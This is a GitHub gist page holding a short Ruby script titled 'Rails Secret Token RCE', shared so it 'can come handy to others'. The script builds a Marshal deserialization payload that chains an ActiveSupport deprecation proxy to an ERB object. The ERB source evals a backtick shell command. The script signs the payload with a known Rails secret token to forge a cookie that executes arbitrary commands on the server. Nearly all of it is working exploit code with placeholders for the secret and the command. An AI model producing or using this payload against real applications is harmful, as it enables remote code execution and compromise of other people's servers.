Skip to content

Instantly share code, notes, and snippets.

@arbazkiraak
Forked from rootxharsh/rails-secret-token-rce.rb
Created September 14, 2019 19:35
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save arbazkiraak/3cb8ede205b366c5053bd98e816381ac to your computer and use it in GitHub Desktop.
Rails Secret Token RCE.
#THIS IS COPIED FROM SOME WHERE. I just saved it in my gists so this can come handy to others
require 'base64'
require 'openssl'
require 'optparse'
require 'open-uri'
SECRET_TOKEN = "SECRET HERE"
code = "eval('`COMMAND HERE`')"
marshal_payload = Base64.encode64(
"\x04\x08" +
"o" +
":\x40ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy" +
"\x07" +
":\x0E@instance" +
"o" + ":\x08ERB" + "\x06" +
":\x09@src" +
Marshal.dump(code)[2..-1] +
":\x0C@method" + ":\x0Bresult"
).chomp
digest = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new("SHA1"),
SECRET_TOKEN, marshal_payload)
marshal_payload = URI::encode(marshal_payload)
puts "#{marshal_payload}--#{digest}"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment